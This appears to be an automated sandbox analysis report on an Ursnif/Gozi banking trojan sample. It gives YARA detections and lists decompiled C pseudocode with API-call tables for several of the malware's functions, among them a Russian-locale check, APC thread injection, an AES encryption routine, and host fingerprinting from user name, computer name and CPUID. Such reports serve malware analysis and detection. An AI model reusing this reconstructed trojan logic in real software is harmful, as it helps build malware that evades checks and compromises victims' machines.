                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.569534669.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    Reputation:low

                      C-Code - Quality: 85%
                      			E004019F1() {
                      				long _v8;
                      				char _v12;
                      				char _v16;
                      				void* _v40;
                      				long _t28;
                      				long _t30;
                      				long _t31;
                      				signed short _t33;
                      				void* _t37;
                      				long _t40;
                      				long _t41;
                      				void* _t48;
                      				intOrPtr _t50;
                      				signed int _t57;
                      				signed int _t58;
                      				long _t63;
                      				long _t65;
                      				intOrPtr _t66;
                      				void* _t71;
                      				void* _t75;
                      				signed int _t77;
                      				signed int _t78;
                      				void* _t82;
                      				intOrPtr* _t83;
                      
                      				_t28 = E00401D68();
                      				_v8 = _t28;
                      				if(_t28 != 0) {
                      					return _t28;
                      				}
                      				do {
                      					_t77 = 0;
                      					_v12 = 0;
                      					_t63 = 0x30;
                      					do {
                      						_t71 = E004012E6(_t63);
                      						if(_t71 == 0) {
                      							_v8 = 8;
                      						} else {
                      							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
                      							_t67 = _t57;
                      							_t58 = _t57 & 0x0000ffff;
                      							_v8 = _t58;
                      							if(_t58 == 4) {
                      								_t63 = _t63 + 0x30;
                      							}
                      							_t78 = 0x13;
                      							_t10 = _t67 + 1; // 0x1
                      							_t77 =  *_t71 % _t78 + _t10;
                      							E00401BA9(_t71);
                      						}
                      					} while (_v8 != 0);
                      					_t30 = E00401688(_t77); // executed
                      					_v8 = _t30;
                      					Sleep(_t77 << 4); // executed
                      					_t31 = _v8;
                      				} while (_t31 == 0x15);
                      				if(_t31 != 0) {
                      					L30:
                      					return _t31;
                      				}
                      				_v12 = 0;
                      				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4);
                      				if(_t33 == 0) {
                      					__imp__GetSystemDefaultUILanguage();
                      					_t67 =  &_v12;
                      					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
                      				}
                      				if(_v12 == 0x5552) {
                      					L28:
                      					_t31 = _v8;
                      					if(_t31 == 0xffffffff) {
                      						_t31 = GetLastError();
                      					}
                      					goto L30;
                      				} else {
                      					if(E00401800(_t67,  &_v16) != 0) {
                      						 *0x404178 = 0;
                      						L20:
                      						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
                      						_t82 = _t37;
                      						if(_t82 == 0) {
                      							L27:
                      							_v8 = GetLastError();
                      							goto L28;
                      						}
                      						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
                      						if(_t40 == 0) {
                      							_t65 = GetLastError();
                      							TerminateThread(_t82, _t65);
                      							CloseHandle(_t82);
                      							_t82 = 0;
                      							SetLastError(_t65);
                      						}
                      						if(_t82 == 0) {
                      							goto L27;
                      						} else {
                      							_t41 = WaitForSingleObject(_t82, 0xffffffff);
                      							_v8 = _t41;
                      							if(_t41 == 0) {
                      								GetExitCodeThread(_t82,  &_v8);
                      							}
                      							CloseHandle(_t82);
                      							goto L28;
                      						}
                      					}
                      					_t66 = _v16;
                      					_t83 = __imp__GetLongPathNameW;
                      					_t48 =  *_t83(_t66, 0, 0); // executed
                      					_t75 = _t48;
                      					if(_t75 == 0) {
                      						L18:
                      						 *0x404178 = _t66;
                      						goto L20;
                      					}
                      					_t22 = _t75 + 2; // 0x2
                      					_t50 = E004012E6(_t75 + _t22);
                      					 *0x404178 = _t50;
                      					if(_t50 == 0) {
                      						goto L18;
                      					}
                      					 *_t83(_t66, _t50, _t75); // executed
                      					E00401BA9(_t66);
                      					goto L20;
                      				}
                      			}


                      APIs
                        • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                        • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
                        • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
                        • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                        • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                      • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
                      • Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                      • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                      • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                      • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                      • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
                      • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
                      • CreateThread.KERNEL32 ref: 00401B27
                      • QueueUserAPC.KERNEL32(0040139F,00000000,?,?,00000000), ref: 00401B3D
                      • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
                      • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
                      • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
                      • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
                      • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                      • String ID:
                      • API String ID: 3475612337-0
                      • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                      • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
                      • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                      • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 113 2bd1508-2bd1548 CryptAcquireContextW 114 2bd169f-2bd16a5 113->114 115 2bd154e-2bd158a memcpy CryptImportKey 113->115 124 2bd16a8-2bd16af 114->124 116 2bd168a-2bd1690 115->116 117 2bd1590-2bd15a2 CryptSetKeyParam 115->117 125 2bd1693-2bd169d CryptReleaseContext 116->125 118 2bd15a8-2bd15b1 117->118 119 2bd1676-2bd167c 117->119 122 2bd15b9-2bd15c6 call 2bd33dc 118->122 123 2bd15b3-2bd15b5 118->123 130 2bd167f-2bd1688 CryptDestroyKey 119->130 131 2bd166d-2bd1674 122->131 132 2bd15cc-2bd15d5 122->132 123->122 126 2bd15b7 123->126 125->124 126->122 130->125 131->130 133 2bd15d8-2bd15e0 132->133 134 2bd15e5-2bd1602 memcpy 133->134 135 2bd15e2 133->135 136 2bd161d-2bd1629 134->136 137 2bd1604-2bd161b CryptEncrypt 134->137 135->134 138 2bd1632-2bd1634 136->138 137->138 139 2bd1644-2bd164f 138->139 140 2bd1636-2bd1640 138->140 142 2bd1651-2bd1661 139->142 144 2bd1663-2bd166b call 2bd61da 139->144 140->133 141 2bd1642 140->141 141->142 142->130 144->130
                      C-Code - Quality: 50%
                      			E02BD1508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                      				int _v8;
                      				long* _v12;
                      				int _v16;
                      				void* _v20;
                      				long* _v24;
                      				void* _v39;
                      				char _v40;
                      				void _v56;
                      				int _v60;
                      				intOrPtr _v64;
                      				void _v67;
                      				char _v68;
                      				void* _t61;
                      				int _t68;
                      				signed int _t76;
                      				int _t79;
                      				int _t81;
                      				void* _t85;
                      				long _t86;
                      				int _t90;
                      				signed int _t94;
                      				int _t101;
                      				void* _t102;
                      				int _t103;
                      				void* _t104;
                      				void* _t105;
                      				void* _t106;
                      
                      				_t103 = __eax;
                      				_t94 = 6;
                      				_v68 = 0;
                      				memset( &_v67, 0, _t94 << 2);
                      				_t105 = _t104 + 0xc;
                      				asm("stosw");
                      				asm("stosb");
                      				_v40 = 0;
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosw");
                      				asm("stosb");
                      				_t61 =  *0x2bda0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                      				if(_t61 == 0) {
                      					_a8 = GetLastError();
                      				} else {
                      					_t101 = 0x10;
                      					memcpy( &_v56, _a8, _t101);
                      					_t106 = _t105 + 0xc;
                      					_v60 = _t101;
                      					_v67 = 2;
                      					_v64 = 0x660e;
                      					_v68 = 8;
                      					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                      					if(_t68 == 0) {
                      						_a8 = GetLastError();
                      					} else {
                      						_push(0);
                      						_push( &_v40);
                      						_push(1);
                      						_push(_v12);
                      						if( *0x2bda0e4() == 0) {
                      							_a8 = GetLastError();
                      						} else {
                      							_t18 = _t103 + 0xf; // 0x10
                      							_t76 = _t18 & 0xfffffff0;
                      							if(_a4 != 0 && _t76 == _t103) {
                      								_t76 = _t76 + _t101;
                      							}
                      							_t102 = E02BD33DC(_t76);
                      							_v20 = _t102;
                      							if(_t102 == 0) {
                      								_a8 = 8;
                      							} else {
                      								_v16 = 0;
                      								_a8 = 0;
                      								while(1) {
                      									_t79 = 0x10;
                      									_v8 = _t79;
                      									if(_t103 <= _t79) {
                      										_v8 = _t103;
                      									}
                      									memcpy(_t102, _a12, _v8);
                      									_t81 = _v8;
                      									_a12 = _a12 + _t81;
                      									_t103 = _t103 - _t81;
                      									_t106 = _t106 + 0xc;
                      									if(_a4 == 0) {
                      										_t85 =  *0x2bda0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                      									} else {
                      										_t85 =  *0x2bda0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                      									}
                      									if(_t85 == 0) {
                      										break;
                      									}
                      									_t90 = _v8;
                      									_v16 = _v16 + _t90;
                      									_t102 = _t102 + _t90;
                      									if(_t103 != 0) {
                      										continue;
                      									} else {
                      										L17:
                      										 *_a16 = _v20;
                      										 *_a20 = _v16;
                      									}
                      									goto L21;
                      								}
                      								_t86 = GetLastError();
                      								_a8 = _t86;
                      								if(_t86 != 0) {
                      									E02BD61DA(_v20);
                      								} else {
                      									goto L17;
                      								}
                      							}
                      						}
                      						L21:
                      						CryptDestroyKey(_v12);
                      					}
                      					CryptReleaseContext(_v24, 0);
                      				}
                      				return _a8;
                      			}

                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02BD5088,00000001,02BD3ECE,00000000), ref: 02BD1540
                      • memcpy.NTDLL(02BD5088,02BD3ECE,00000010,?,?,?,02BD5088,00000001,02BD3ECE,00000000,?,02BD66D9,00000000,02BD3ECE,?,775EC740), ref: 02BD1559
                      • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02BD1582
                      • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02BD159A
                      • memcpy.NTDLL(00000000,775EC740,035B9600,00000010), ref: 02BD15EC
                      • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,035B9600,00000020,?,?,00000010), ref: 02BD1615
                      • GetLastError.KERNEL32(?,?,00000010), ref: 02BD1644
                      • GetLastError.KERNEL32 ref: 02BD1676
                      • CryptDestroyKey.ADVAPI32(00000000), ref: 02BD1682
                      • GetLastError.KERNEL32 ref: 02BD168A
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02BD1697
                      • GetLastError.KERNEL32(?,?,?,02BD5088,00000001,02BD3ECE,00000000,?,02BD66D9,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD169F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                      • String ID: @MqtNqt
                      • API String ID: 3401600162-2883916605
                      • Opcode ID: 5e57371814cadc3560f6e17846130e75240b1e85970ab3c0297df470325a6df4
                      • Instruction ID: 7876f54e6f983a28370125d5553273fdbd7e211a4f193f72fc52d9e81be953f7
                      • Opcode Fuzzy Hash: 5e57371814cadc3560f6e17846130e75240b1e85970ab3c0297df470325a6df4
                      • Instruction Fuzzy Hash: 5F513AB5910209AFDB10DFA8D884AEE7BB9FB08354F0484A9F919E7140E7748A54DF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 235 2bd3bd3-2bd3be7 236 2bd3be9-2bd3bee 235->236 237 2bd3bf1-2bd3c03 call 2bd71cd 235->237 236->237 240 2bd3c05-2bd3c15 GetUserNameW 237->240 241 2bd3c57-2bd3c64 237->241 242 2bd3c17-2bd3c27 RtlAllocateHeap 240->242 243 2bd3c66-2bd3c7d GetComputerNameW 240->243 241->243 242->243 244 2bd3c29-2bd3c36 GetUserNameW 242->244 245 2bd3c7f-2bd3c90 RtlAllocateHeap 243->245 246 2bd3cbb-2bd3cdf 243->246 247 2bd3c38-2bd3c44 call 2bd56b9 244->247 248 2bd3c46-2bd3c55 244->248 245->246 249 2bd3c92-2bd3c9b GetComputerNameW 245->249 247->248 248->243 251 2bd3c9d-2bd3ca9 call 2bd56b9 249->251 252 2bd3cac-2bd3caf 249->252 251->252 252->246
                      C-Code - Quality: 96%
                      			E02BD3BD3(char __eax, void* __esi) {
                      				long _v8;
                      				char _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v28;
                      				long _t34;
                      				signed int _t39;
                      				long _t50;
                      				char _t59;
                      				intOrPtr _t61;
                      				void* _t62;
                      				void* _t64;
                      				char _t65;
                      				intOrPtr* _t67;
                      				void* _t68;
                      				void* _t69;
                      
                      				_t69 = __esi;
                      				_t65 = __eax;
                      				_v8 = 0;
                      				_v12 = __eax;
                      				if(__eax == 0) {
                      					_t59 =  *0x2bda310; // 0xd448b889
                      					_v12 = _t59;
                      				}
                      				_t64 = _t69;
                      				E02BD71CD( &_v12, _t64);
                      				if(_t65 != 0) {
                      					 *_t69 =  *_t69 ^  *0x2bda344 ^ 0x6c7261ae;
                      				} else {
                      					GetUserNameW(0,  &_v8); // executed
                      					_t50 = _v8;
                      					if(_t50 != 0) {
                      						_t62 = RtlAllocateHeap( *0x2bda2d8, 0, _t50 + _t50);
                      						if(_t62 != 0) {
                      							if(GetUserNameW(_t62,  &_v8) != 0) {
                      								_t64 = _t62;
                      								 *_t69 =  *_t69 ^ E02BD56B9(_v8 + _v8, _t64);
                      							}
                      							HeapFree( *0x2bda2d8, 0, _t62);
                      						}
                      					}
                      				}
                      				_t61 = __imp__;
                      				_v8 = _v8 & 0x00000000;
                      				GetComputerNameW(0,  &_v8);
                      				_t34 = _v8;
                      				if(_t34 != 0) {
                      					_t68 = RtlAllocateHeap( *0x2bda2d8, 0, _t34 + _t34);
                      					if(_t68 != 0) {
                      						if(GetComputerNameW(_t68,  &_v8) != 0) {
                      							_t64 = _t68;
                      							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02BD56B9(_v8 + _v8, _t64);
                      						}
                      						HeapFree( *0x2bda2d8, 0, _t68);
                      					}
                      				}
                      				asm("cpuid");
                      				_t67 =  &_v28;
                      				 *_t67 = 1;
                      				 *((intOrPtr*)(_t67 + 4)) = _t61;
                      				 *((intOrPtr*)(_t67 + 8)) = 0;
                      				 *(_t67 + 0xc) = _t64;
                      				_t39 = _v16 ^ _v20 ^ _v28;
                      				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                      				return _t39;
                      			}

                      APIs
                      • GetUserNameW.ADVAPI32(00000000,?), ref: 02BD3C0A
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 02BD3C21
                      • GetUserNameW.ADVAPI32(00000000,?), ref: 02BD3C2E
                      • HeapFree.KERNEL32(00000000,00000000), ref: 02BD3C4F
                      • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BD3C76
                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02BD3C8A
                      • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BD3C97
                      • HeapFree.KERNEL32(00000000,00000000), ref: 02BD3CB5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: HeapName$AllocateComputerFreeUser
                      • String ID: Uqt
                      • API String ID: 3239747167-2320327147
                      • Opcode ID: c1bc944aa7623993474abd3cdbc34e8f615d9841ab7d6cde6cd01b0b32b6f0e7
                      • Instruction ID: 2480b4316a7db016568c5e7c833c63049feace692ef17a81b2fc301da8dcb887
                      • Opcode Fuzzy Hash: c1bc944aa7623993474abd3cdbc34e8f615d9841ab7d6cde6cd01b0b32b6f0e7
                      • Instruction Fuzzy Hash: E4312871A01205AFDB10DFA9DD81AAAB7F9EB48240F6488A9E544D3211F730EA549F51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 38%
                      			E02BD421F(char _a4, void* _a8) {
                      				void* _v8;
                      				void* _v12;
                      				char _v16;
                      				void* _v20;
                      				char _v24;
                      				char _v28;
                      				char _v32;
                      				char _v36;
                      				char _v40;
                      				void* _v44;
                      				void** _t33;
                      				void* _t40;
                      				void* _t43;
                      				void** _t44;
                      				intOrPtr* _t47;
                      				char _t48;
                      
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				_v20 = _a4;
                      				_t48 = 0;
                      				_v16 = 0;
                      				_a4 = 0;
                      				_v44 = 0x18;
                      				_v40 = 0;
                      				_v32 = 0;
                      				_v36 = 0;
                      				_v28 = 0;
                      				_v24 = 0;
                      				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                      					_t33 =  &_v8;
                      					__imp__(_v12, 8, _t33);
                      					if(_t33 >= 0) {
                      						_t47 = __imp__;
                      						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                      						_t44 = E02BD33DC(_a4);
                      						if(_t44 != 0) {
                      							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                      							if(_t40 >= 0) {
                      								memcpy(_a8,  *_t44, 0x1c);
                      								_t48 = 1;
                      							}
                      							E02BD61DA(_t44);
                      						}
                      						NtClose(_v8); // executed
                      					}
                      					NtClose(_v12);
                      				}
                      				return _t48;
                      			}

                      APIs
                      • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02BD4266
                      • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02BD4279
                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BD4295
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BD42B2
                      • memcpy.NTDLL(?,00000000,0000001C), ref: 02BD42BF
                      • NtClose.NTDLL(?), ref: 02BD42D1
                      • NtClose.NTDLL(00000000), ref: 02BD42DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                      • String ID:
                      • API String ID: 2575439697-0
                      • Opcode ID: 51a8f5c30c52e80b2b9bcdd018a42bf270969bcc12a6a093c37cff1ed4ae12b4
                      • Instruction ID: 8ba244f61077cc4b0ccf4d404632767e4614017592a4a9c3e648fae07cd62bc6
                      • Opcode Fuzzy Hash: 51a8f5c30c52e80b2b9bcdd018a42bf270969bcc12a6a093c37cff1ed4ae12b4
                      • Instruction Fuzzy Hash: 1F2116B2911228BBDB019FA5DC85EDEBFBDEF08750F104062F905E6110E7718A549FA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 284 4015b0-401607 GetSystemTimeAsFileTime 287 401609 284->287 288 40160e-401627 CreateFileMappingW 284->288 287->288 289 401671-401677 GetLastError 288->289 290 401629-401632 288->290 291 401679-40167f 289->291 292 401642-401650 MapViewOfFile 290->292 293 401634-40163b GetLastError 290->293 295 401660-401666 GetLastError 292->295 296 401652-40165e 292->296 293->292 294 40163d-401640 293->294 297 401668-40166f CloseHandle 294->297 295->291 295->297 296->291 297->291
                      C-Code - Quality: 69%
                      			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                      				intOrPtr _v12;
                      				struct _FILETIME* _v16;
                      				short _v60;
                      				struct _FILETIME* _t14;
                      				intOrPtr _t15;
                      				long _t18;
                      				void* _t19;
                      				void* _t22;
                      				intOrPtr _t31;
                      				long _t32;
                      				void* _t34;
                      
                      				_t31 = __edx;
                      				_t14 =  &_v16;
                      				GetSystemTimeAsFileTime(_t14);
                      				_push(0x192);
                      				_push(0x54d38000);
                      				_push(_v12);
                      				_push(_v16);
                      				L00402026();
                      				_push(_t14);
                      				_v16 = _t14;
                      				_t15 =  *0x404184;
                      				_push(_t15 + 0x4051ca);
                      				_push(_t15 + 0x4051c0);
                      				_push(0x16);
                      				_push( &_v60);
                      				_v12 = _t31;
                      				L00402020();
                      				_t18 = _a4;
                      				if(_t18 == 0) {
                      					_t18 = 0x1000;
                      				}
                      				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
                      				_t34 = _t19;
                      				if(_t34 == 0) {
                      					_t32 = GetLastError();
                      				} else {
                      					if(_a4 != 0 || GetLastError() == 0xb7) {
                      						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                      						if(_t22 == 0) {
                      							_t32 = GetLastError();
                      							if(_t32 != 0) {
                      								goto L9;
                      							}
                      						} else {
                      							 *_a8 = _t34;
                      							 *_a12 = _t22;
                      							_t32 = 0;
                      						}
                      					} else {
                      						_t32 = 2;
                      						L9:
                      						CloseHandle(_t34);
                      					}
                      				}
                      				return _t32;
                      			}

                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
                      • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401648
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
                      • String ID:
                      • API String ID: 3812556954-0
                      • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                      • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
                      • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                      • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E0040110B(intOrPtr* __eax, void** _a4) {
                      				int _v12;
                      				void* _v16;
                      				void* _v20;
                      				void* _v24;
                      				int _v28;
                      				int _v32;
                      				intOrPtr _v36;
                      				int _v40;
                      				int _v44;
                      				void* _v48;
                      				void* __esi;
                      				long _t34;
                      				void* _t39;
                      				void* _t47;
                      				intOrPtr* _t48;
                      
                      				_t48 = __eax;
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				_v24 =  *((intOrPtr*)(__eax + 4));
                      				_v16 = 0;
                      				_v12 = 0;
                      				_v48 = 0x18;
                      				_v44 = 0;
                      				_v36 = 0x40;
                      				_v40 = 0;
                      				_v32 = 0;
                      				_v28 = 0;
                      				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                      				if(_t34 < 0) {
                      					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                      				} else {
                      					 *_t48 = _v16;
                      					_t39 = E00401459(_t48,  &_v12); // executed
                      					_t47 = _t39;
                      					if(_t47 != 0) {
                      						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                      					} else {
                      						memset(_v12, 0, _v24);
                      						 *_a4 = _v12;
                      					}
                      				}
                      				return _t47;
                      			}

                      APIs
                      • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401168
                        • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                      • memset.NTDLL ref: 0040118A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: Section$CreateViewmemset
                      • String ID: @
                      • API String ID: 2533685722-2766056989
                      • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                      • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
